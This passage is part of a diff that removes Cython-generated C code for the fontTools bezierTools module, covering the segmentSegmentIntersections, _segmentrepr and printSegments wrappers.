__Pyx_GOTREF(__pyx_t_6); - __pyx_t_7 = __Pyx_PyDict_NewPresized(3); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 1446, __pyx_L11_error) - __Pyx_GOTREF(__pyx_t_7); - __pyx_t_13 = __Pyx_PyObject_GetAttrStr(__pyx_8genexpr8__pyx_v_i, __pyx_n_s_pt); if (unlikely(!__pyx_t_13)) __PYX_ERR(0, 1446, __pyx_L11_error) - __Pyx_GOTREF(__pyx_t_13); - if (PyDict_SetItem(__pyx_t_7, __pyx_n_s_pt, __pyx_t_13) < 0) __PYX_ERR(0, 1446, __pyx_L11_error) - __Pyx_DECREF(__pyx_t_13); __pyx_t_13 = 0; - __pyx_t_13 = __Pyx_PyObject_GetAttrStr(__pyx_8genexpr8__pyx_v_i, __pyx_n_s_t2); if (unlikely(!__pyx_t_13)) __PYX_ERR(0, 1446, __pyx_L11_error) - __Pyx_GOTREF(__pyx_t_13); - if (PyDict_SetItem(__pyx_t_7, __pyx_n_s_t1, __pyx_t_13) < 0) __PYX_ERR(0, 1446, __pyx_L11_error) - __Pyx_DECREF(__pyx_t_13); __pyx_t_13 = 0; - __pyx_t_13 = __Pyx_PyObject_GetAttrStr(__pyx_8genexpr8__pyx_v_i, __pyx_n_s_t1); if (unlikely(!__pyx_t_13)) __PYX_ERR(0, 1446, __pyx_L11_error) - __Pyx_GOTREF(__pyx_t_13); - if (PyDict_SetItem(__pyx_t_7, __pyx_n_s_t2, __pyx_t_13) < 0) __PYX_ERR(0, 1446, __pyx_L11_error) - __Pyx_DECREF(__pyx_t_13); __pyx_t_13 = 0; - __pyx_t_13 = __Pyx_PyObject_Call(__pyx_t_6, __pyx_empty_tuple, __pyx_t_7); if (unlikely(!__pyx_t_13)) __PYX_ERR(0, 1446, __pyx_L11_error) - __Pyx_GOTREF(__pyx_t_13); - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; - if (unlikely(__Pyx_ListComp_Append(__pyx_t_8, (PyObject*)__pyx_t_13))) __PYX_ERR(0, 1446, __pyx_L11_error) - __Pyx_DECREF(__pyx_t_13); __pyx_t_13 = 0; - } - __Pyx_DECREF(__pyx_t_11); __pyx_t_11 = 0; - __Pyx_XDECREF(__pyx_8genexpr8__pyx_v_i); __pyx_8genexpr8__pyx_v_i = 0; - goto __pyx_L15_exit_scope; - __pyx_L11_error:; - __Pyx_XDECREF(__pyx_8genexpr8__pyx_v_i); __pyx_8genexpr8__pyx_v_i = 0; - goto __pyx_L1_error; - __pyx_L15_exit_scope:; - } /* exit inner scope */ - __pyx_r = __pyx_t_8; - __pyx_t_8 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":1401 - * - * - * def segmentSegmentIntersections(seg1, seg2): # <<<<<<<<<<<<<< - * """Finds intersections between two segments. - * - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_6); - __Pyx_XDECREF(__pyx_t_7); - __Pyx_XDECREF(__pyx_t_8); - __Pyx_XDECREF(__pyx_t_11); - __Pyx_XDECREF(__pyx_t_13); - __Pyx_AddTraceback("fontTools.misc.bezierTools.segmentSegmentIntersections", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XDECREF(__pyx_v_intersections); - __Pyx_XDECREF(__pyx_8genexpr8__pyx_v_i); - __Pyx_XDECREF(__pyx_v_seg1); - __Pyx_XDECREF(__pyx_v_seg2); - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":1449 - * - * - * def _segmentrepr(obj): # <<<<<<<<<<<<<< - * """ - * >>> _segmentrepr([1, [2, 3], [], [[2, [3, 4], [0.1, 2.2]]]]) - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_91_segmentrepr(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_90_segmentrepr, "_segmentrepr(obj)\n\n >>> _segmentrepr([1, [2, 3], [], [[2, [3, 4], [0.1, 2.2]]]])\n '(1, (2, 3), (), ((2, (3, 4), (0.1, 2.2))))'\n "); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_91_segmentrepr = {"_segmentrepr", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_91_segmentrepr, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_90_segmentrepr}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_91_segmentrepr(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - PyObject *__pyx_v_obj = 0; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[1] = {0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("_segmentrepr (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_obj,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_obj)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1449, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "_segmentrepr") < 0)) __PYX_ERR(0, 1449, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs != 1)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - } - __pyx_v_obj = values[0]; - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("_segmentrepr", 1, 1, 1, __pyx_nargs); __PYX_ERR(0, 1449, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools._segmentrepr", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_90_segmentrepr(__pyx_self, __pyx_v_obj); - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} -static PyObject *__pyx_gb_9fontTools_4misc_11bezierTools_12_segmentrepr_2generator5(__pyx_CoroutineObject *__pyx_generator, CYTHON_UNUSED PyThreadState *__pyx_tstate, PyObject *__pyx_sent_value); /* proto */ - -/* "fontTools/misc/bezierTools.py":1459 - * return "%g" % obj - * else: - * return "(%s)" % ", ".join(_segmentrepr(x) for x in it) # <<<<<<<<<<<<<< - * - * - */ - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_12_segmentrepr_genexpr(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_genexpr_arg_0) { - struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr *__pyx_cur_scope; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("genexpr", 0); - __pyx_cur_scope = (struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr *)__pyx_tp_new_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr(__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr, __pyx_empty_tuple, NULL); - if (unlikely(!__pyx_cur_scope)) { - __pyx_cur_scope = ((struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr *)Py_None); - __Pyx_INCREF(Py_None); - __PYX_ERR(0, 1459, __pyx_L1_error) - } else { - __Pyx_GOTREF((PyObject *)__pyx_cur_scope); - } - __pyx_cur_scope->__pyx_genexpr_arg_0 = __pyx_genexpr_arg_0; - __Pyx_INCREF(__pyx_cur_scope->__pyx_genexpr_arg_0); - __Pyx_GIVEREF(__pyx_cur_scope->__pyx_genexpr_arg_0); - { - __pyx_CoroutineObject *gen = __Pyx_Generator_New((__pyx_coroutine_body_t) __pyx_gb_9fontTools_4misc_11bezierTools_12_segmentrepr_2generator5, NULL, (PyObject *) __pyx_cur_scope, __pyx_n_s_genexpr, __pyx_n_s_segmentrepr_locals_genexpr, __pyx_n_s_fontTools_misc_bezierTools); if (unlikely(!gen)) __PYX_ERR(0, 1459, __pyx_L1_error) - __Pyx_DECREF(__pyx_cur_scope); - __Pyx_RefNannyFinishContext(); - return (PyObject *) gen; - } - - /* function exit code */ - __pyx_L1_error:; - __Pyx_AddTraceback("fontTools.misc.bezierTools._segmentrepr.genexpr", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __Pyx_DECREF((PyObject *)__pyx_cur_scope); - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_gb_9fontTools_4misc_11bezierTools_12_segmentrepr_2generator5(__pyx_CoroutineObject *__pyx_generator, CYTHON_UNUSED PyThreadState *__pyx_tstate, PyObject *__pyx_sent_value) /* generator body */ -{ - struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr *__pyx_cur_scope = ((struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr *)__pyx_generator->closure); - PyObject *__pyx_r = NULL; - PyObject *__pyx_t_1 = NULL; - Py_ssize_t __pyx_t_2; - PyObject *(*__pyx_t_3)(PyObject *); - PyObject *__pyx_t_4 = NULL; - PyObject *__pyx_t_5 = NULL; - PyObject *__pyx_t_6 = NULL; - int __pyx_t_7; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("genexpr", 0); - switch (__pyx_generator->resume_label) { - case 0: goto __pyx_L3_first_run; - default: /* CPython raises the right error here */ - __Pyx_RefNannyFinishContext(); - return NULL; - } - __pyx_L3_first_run:; - if (unlikely(!__pyx_sent_value)) __PYX_ERR(0, 1459, __pyx_L1_error) - __pyx_r = PyList_New(0); if (unlikely(!__pyx_r)) __PYX_ERR(0, 1459, __pyx_L1_error) - __Pyx_GOTREF(__pyx_r); - if (unlikely(!__pyx_cur_scope->__pyx_genexpr_arg_0)) { __Pyx_RaiseUnboundLocalError(".0"); __PYX_ERR(0, 1459, __pyx_L1_error) } - if (likely(PyList_CheckExact(__pyx_cur_scope->__pyx_genexpr_arg_0)) || PyTuple_CheckExact(__pyx_cur_scope->__pyx_genexpr_arg_0)) { - __pyx_t_1 = __pyx_cur_scope->__pyx_genexpr_arg_0; __Pyx_INCREF(__pyx_t_1); - __pyx_t_2 = 0; - __pyx_t_3 = NULL; - } else { - __pyx_t_2 = -1; __pyx_t_1 = PyObject_GetIter(__pyx_cur_scope->__pyx_genexpr_arg_0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1459, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_3 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1459, __pyx_L1_error) - } - for (;;) { - if (likely(!__pyx_t_3)) { - if (likely(PyList_CheckExact(__pyx_t_1))) { - { - Py_ssize_t __pyx_temp = __Pyx_PyList_GET_SIZE(__pyx_t_1); - #if !CYTHON_ASSUME_SAFE_MACROS - if (unlikely((__pyx_temp < 0))) __PYX_ERR(0, 1459, __pyx_L1_error) - #endif - if (__pyx_t_2 >= __pyx_temp) break; - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - __pyx_t_4 = PyList_GET_ITEM(__pyx_t_1, __pyx_t_2); __Pyx_INCREF(__pyx_t_4); __pyx_t_2++; if (unlikely((0 < 0))) __PYX_ERR(0, 1459, __pyx_L1_error) - #else - __pyx_t_4 = __Pyx_PySequence_ITEM(__pyx_t_1, __pyx_t_2); __pyx_t_2++; if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1459, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - #endif - } else { - { - Py_ssize_t __pyx_temp = __Pyx_PyTuple_GET_SIZE(__pyx_t_1); - #if !CYTHON_ASSUME_SAFE_MACROS - if (unlikely((__pyx_temp < 0))) __PYX_ERR(0, 1459, __pyx_L1_error) - #endif - if (__pyx_t_2 >= __pyx_temp) break; - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - __pyx_t_4 = PyTuple_GET_ITEM(__pyx_t_1, __pyx_t_2); __Pyx_INCREF(__pyx_t_4); __pyx_t_2++; if (unlikely((0 < 0))) __PYX_ERR(0, 1459, __pyx_L1_error) - #else - __pyx_t_4 = __Pyx_PySequence_ITEM(__pyx_t_1, __pyx_t_2); __pyx_t_2++; if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1459, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - #endif - } - } else { - __pyx_t_4 = __pyx_t_3(__pyx_t_1); - if (unlikely(!__pyx_t_4)) { - PyObject* exc_type = PyErr_Occurred(); - if (exc_type) { - if (likely(__Pyx_PyErr_GivenExceptionMatches(exc_type, PyExc_StopIteration))) PyErr_Clear(); - else __PYX_ERR(0, 1459, __pyx_L1_error) - } - break; - } - __Pyx_GOTREF(__pyx_t_4); - } - __Pyx_XGOTREF(__pyx_cur_scope->__pyx_v_x); - __Pyx_XDECREF_SET(__pyx_cur_scope->__pyx_v_x, __pyx_t_4); - __Pyx_GIVEREF(__pyx_t_4); - __pyx_t_4 = 0; - __Pyx_GetModuleGlobalName(__pyx_t_5, __pyx_n_s_segmentrepr); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 1459, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __pyx_t_6 = NULL; - __pyx_t_7 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_5))) { - __pyx_t_6 = PyMethod_GET_SELF(__pyx_t_5); - if (likely(__pyx_t_6)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_5); - __Pyx_INCREF(__pyx_t_6); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_5, function); - __pyx_t_7 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[2] = {__pyx_t_6, __pyx_cur_scope->__pyx_v_x}; - __pyx_t_4 = __Pyx_PyObject_FastCall(__pyx_t_5, __pyx_callargs+1-__pyx_t_7, 1+__pyx_t_7); - __Pyx_XDECREF(__pyx_t_6); __pyx_t_6 = 0; - if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1459, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - } - if (unlikely(__Pyx_ListComp_Append(__pyx_r, (PyObject*)__pyx_t_4))) __PYX_ERR(0, 1459, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - } - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - CYTHON_MAYBE_UNUSED_VAR(__pyx_cur_scope); - - /* function exit code */ - goto __pyx_L0; - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_r); __pyx_r = 0; - __Pyx_Generator_Replace_StopIteration(0); - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_4); - __Pyx_XDECREF(__pyx_t_5); - __Pyx_XDECREF(__pyx_t_6); - __Pyx_AddTraceback("genexpr", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_L0:; - __Pyx_XGIVEREF(__pyx_r); - #if !CYTHON_USE_EXC_INFO_STACK - __Pyx_Coroutine_ResetAndClearException(__pyx_generator); - #endif - __pyx_generator->resume_label = -1; - __Pyx_Coroutine_clear((PyObject*)__pyx_generator); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":1449 - * - * - * def _segmentrepr(obj): # <<<<<<<<<<<<<< - * """ - * >>> _segmentrepr([1, [2, 3], [], [[2, [3, 4], [0.1, 2.2]]]]) - */ - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_90_segmentrepr(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_obj) { - PyObject *__pyx_v_it = NULL; - PyObject *__pyx_gb_9fontTools_4misc_11bezierTools_12_segmentrepr_2generator5 = 0; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - PyObject *__pyx_t_3 = NULL; - PyObject *__pyx_t_4 = NULL; - PyObject *__pyx_t_5 = NULL; - int __pyx_t_6; - PyObject *__pyx_t_7 = NULL; - PyObject *__pyx_t_8 = NULL; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("_segmentrepr", 1); - - /* "fontTools/misc/bezierTools.py":1454 - * '(1, (2, 3), (), ((2, (3, 4), (0.1, 2.2))))' - * """ - * try: # <<<<<<<<<<<<<< - * it = iter(obj) - * except TypeError: - */ - { - __Pyx_PyThreadState_declare - __Pyx_PyThreadState_assign - __Pyx_ExceptionSave(&__pyx_t_1, &__pyx_t_2, &__pyx_t_3); - __Pyx_XGOTREF(__pyx_t_1); - __Pyx_XGOTREF(__pyx_t_2); - __Pyx_XGOTREF(__pyx_t_3); - /*try:*/ { - - /* "fontTools/misc/bezierTools.py":1455 - * """ - * try: - * it = iter(obj) # <<<<<<<<<<<<<< - * except TypeError: - * return "%g" % obj - */ - __pyx_t_4 = PyObject_GetIter(__pyx_v_obj); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1455, __pyx_L3_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_v_it = __pyx_t_4; - __pyx_t_4 = 0; - - /* "fontTools/misc/bezierTools.py":1454 - * '(1, (2, 3), (), ((2, (3, 4), (0.1, 2.2))))' - * """ - * try: # <<<<<<<<<<<<<< - * it = iter(obj) - * except TypeError: - */ - } - - /* "fontTools/misc/bezierTools.py":1459 - * return "%g" % obj - * else: - * return "(%s)" % ", ".join(_segmentrepr(x) for x in it) # <<<<<<<<<<<<<< - * - * - */ - /*else:*/ { - __Pyx_XDECREF(__pyx_r); - __pyx_t_4 = __pyx_pf_9fontTools_4misc_11bezierTools_12_segmentrepr_genexpr(NULL, __pyx_v_it); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1459, __pyx_L5_except_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_5 = __Pyx_Generator_Next(__pyx_t_4); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 1459, __pyx_L5_except_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __pyx_t_4 = PyUnicode_Join(__pyx_kp_u__9, __pyx_t_5); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1459, __pyx_L5_except_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __pyx_t_5 = PyUnicode_Format(__pyx_kp_u_s_2, __pyx_t_4); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 1459, __pyx_L5_except_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __pyx_r = __pyx_t_5; - __pyx_t_5 = 0; - goto __pyx_L6_except_return; - } - __pyx_L3_error:; - __Pyx_XDECREF(__pyx_t_4); __pyx_t_4 = 0; - - /* "fontTools/misc/bezierTools.py":1456 - * try: - * it = iter(obj) - * except TypeError: # <<<<<<<<<<<<<< - * return "%g" % obj - * else: - */ - __pyx_t_6 = __Pyx_PyErr_ExceptionMatches(__pyx_builtin_TypeError); - if (__pyx_t_6) { - __Pyx_AddTraceback("fontTools.misc.bezierTools._segmentrepr", __pyx_clineno, __pyx_lineno, __pyx_filename); - if (__Pyx_GetException(&__pyx_t_5, &__pyx_t_4, &__pyx_t_7) < 0) __PYX_ERR(0, 1456, __pyx_L5_except_error) - __Pyx_XGOTREF(__pyx_t_5); - __Pyx_XGOTREF(__pyx_t_4); - __Pyx_XGOTREF(__pyx_t_7); - - /* "fontTools/misc/bezierTools.py":1457 - * it = iter(obj) - * except TypeError: - * return "%g" % obj # <<<<<<<<<<<<<< - * else: - * return "(%s)" % ", ".join(_segmentrepr(x) for x in it) - */ - __Pyx_XDECREF(__pyx_r); - __pyx_t_8 = __Pyx_PyUnicode_FormatSafe(__pyx_kp_u_g, __pyx_v_obj); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 1457, __pyx_L5_except_error) - __Pyx_GOTREF(__pyx_t_8); - __pyx_r = __pyx_t_8; - __pyx_t_8 = 0; - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; - goto __pyx_L6_except_return; - } - goto __pyx_L5_except_error; - - /* "fontTools/misc/bezierTools.py":1454 - * '(1, (2, 3), (), ((2, (3, 4), (0.1, 2.2))))' - * """ - * try: # <<<<<<<<<<<<<< - * it = iter(obj) - * except TypeError: - */ - __pyx_L5_except_error:; - __Pyx_XGIVEREF(__pyx_t_1); - __Pyx_XGIVEREF(__pyx_t_2); - __Pyx_XGIVEREF(__pyx_t_3); - __Pyx_ExceptionReset(__pyx_t_1, __pyx_t_2, __pyx_t_3); - goto __pyx_L1_error; - __pyx_L6_except_return:; - __Pyx_XGIVEREF(__pyx_t_1); - __Pyx_XGIVEREF(__pyx_t_2); - __Pyx_XGIVEREF(__pyx_t_3); - __Pyx_ExceptionReset(__pyx_t_1, __pyx_t_2, __pyx_t_3); - goto __pyx_L0; - } - - /* "fontTools/misc/bezierTools.py":1449 - * - * - * def _segmentrepr(obj): # <<<<<<<<<<<<<< - * """ - * >>> _segmentrepr([1, [2, 3], [], [[2, [3, 4], [0.1, 2.2]]]]) - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_4); - __Pyx_XDECREF(__pyx_t_5); - __Pyx_XDECREF(__pyx_t_7); - __Pyx_XDECREF(__pyx_t_8); - __Pyx_AddTraceback("fontTools.misc.bezierTools._segmentrepr", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XDECREF(__pyx_v_it); - __Pyx_XDECREF(__pyx_gb_9fontTools_4misc_11bezierTools_12_segmentrepr_2generator5); - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":1462 - * - * - * def printSegments(segments): # <<<<<<<<<<<<<< - * """Helper for the doctests, displaying each segment in a list of - * segments on a single line as a tuple. - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_93printSegments(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_92printSegments, "printSegments(segments)\nHelper for the doctests, displaying each segment in a list of\n segments on a single line as a tuple.\n "); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_93printSegments = {"printSegments", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_93printSegments, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_92printSegments}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_93printSegments(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - PyObject *__pyx_v_segments = 0; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[1] = {0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("printSegments (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_segments,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_segments)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1462, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "printSegments") < 0)) __PYX_ERR(0, 1462, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs != 1)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - } - __pyx_v_segments = values[0]; - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("printSegments", 1, 1, 1, __pyx_nargs); __PYX_ERR(0, 1462, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools.printSegments", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_92printSegments(__pyx_self, __pyx_v_segments); - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_92printSegments(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_segments) { - PyObject *__pyx_v_segment = NULL; - PyObject 